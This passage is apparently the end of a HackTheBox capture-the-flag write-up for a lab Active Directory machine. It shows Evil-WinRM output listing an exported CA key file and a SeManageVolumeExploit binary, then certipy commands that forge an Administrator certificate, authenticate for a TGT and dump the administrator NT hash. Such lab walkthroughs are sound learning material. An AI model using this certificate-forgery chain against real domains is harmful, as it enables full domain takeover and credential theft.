-a---- 6/2/2025 6:18 AM 2675 ca_exported.pfx
-a---- 6/2/2025 6:16 AM 12288 SeManageVolumeExploit.exe
*Evil-WinRM* PS C:\\Users\\Ryan.K\\Documents>
Now we have to transfer the
PFXfile to our machine, forge an admin certificate
└─$ certipy forge -ca-pfx ca_exported.pfx -upn ADMINISTRATOR@CERTIFICATE.HTB -subject 'CN=ADMINISTRATOR,CN=USERS,DC=CERTIFICATE,DC=HTB'
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Saving forged certificate and private key to 'administrator_forged.pfx'
[*] Wrote forged certificate and private key to 'administrator_forged.pfx'
Now using
adminsitartor_forged.pfxwe will try authenticate
└─$ certipy auth -pfx administrator_forged.pfx -dc-ip '10.129.249.191'
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'ADMINISTRATOR@CERTIFICATE.HTB'
[*] Using principal: 'administrator@certificate.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@certificate.htb': aad3b435b51404eeaad3b435b51404ee:d804304519bf0143c14cbf1c024408c6
login as administrator, and we have
root.txt
Directory: C:\\Users\\Administrator\\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 6/1/2025 4:45 PM 34 root.txt
Last updated